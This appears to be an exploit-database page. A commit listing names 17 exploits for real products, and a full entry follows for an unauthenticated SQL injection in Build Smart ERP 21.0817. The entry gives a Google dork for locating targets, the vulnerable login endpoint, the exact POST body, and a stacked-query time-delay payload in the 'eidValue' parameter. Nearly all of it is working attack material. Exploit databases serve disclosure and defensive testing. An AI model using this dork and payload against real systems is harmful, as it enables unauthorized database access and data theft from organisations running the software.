
17 changes to exploits/shellcodes Netgear Genie 2.4.64 - Unquoted Service Path OpenClinic GA 5.194.18 - Local Privilege Escalation Gestionale Open 11.00.00 - Local Privilege Escalation Hikvision Web Server Build 210702 - Command Injection WordPress Plugin TaxoPress 3.0.7.1 - Stored Cross-Site Scripting (XSS) (Authenticated) Engineers Online Portal 1.0 - File Upload Remote Code Execution (RCE) Build Smart ERP 21.0817 - 'eidValue' SQL Injection (Unauthenticated) Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2) Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated) Online Event Booking and Reservation System 1.0 - 'reason' Stored Cross-Site Scripting (XSS) Engineers Online Portal 1.0 - 'multiple' Stored Cross-Site Scripting (XSS) Engineers Online Portal 1.0 - 'multiple' Authentication Bypass Engineers Online Portal 1.0 - 'id' SQL Injection WordPress Plugin Media-Tags 3.2.0.2 - Stored Cross-Site Scripting (XSS) WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS) Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2) phpMyAdmin 4.8.1 - Remote Code Execution (RCE)
24 lines
No EOL
803 B
Text
24 lines
No EOL
803 B
Text
# Exploit Title: Build Smart ERP 21.0817 - 'eidValue' SQL Injection (Unauthenticated)
|
|
# Date: 24/10/2021
|
|
# Exploit Author: Nehru Sethuraman
|
|
# Vendor Homepage: https://ribccs.com/solutions/solution-buildsmart
|
|
# Version: 21.0817
|
|
# Build: 3
|
|
# Google Dorks: intitle:buildsmart accounting
|
|
# Tested on: OS - Windows 2012 R2 or 8.1 & Database - Microsoft SQL Server 2014
|
|
|
|
Exploit Details:
|
|
|
|
URL: https://example.com/acc/validateLogin.asp?SkipDBSetup=NO&redirectUrl=
|
|
|
|
*HTTP Method:* POST
|
|
|
|
*POST DATA:*
|
|
|
|
VersionNumber=21.0906&activexVersion=3%2C9%2C0%2C0&XLImportCab=1%2C21%2C0%2C0&updaterActivexVersion=4%2C19%2C0%2C0&lang=eng&rptlang=eng&loginID=admin&userPwd=admin&EID=company&eidValue=company&userEmail=
|
|
|
|
Vulnerable Parameter: eidValue
|
|
|
|
SQL Injection Type: Stacked queries
|
|
|
|
Payload: ';WAITFOR DELAY '0:0:3'-- |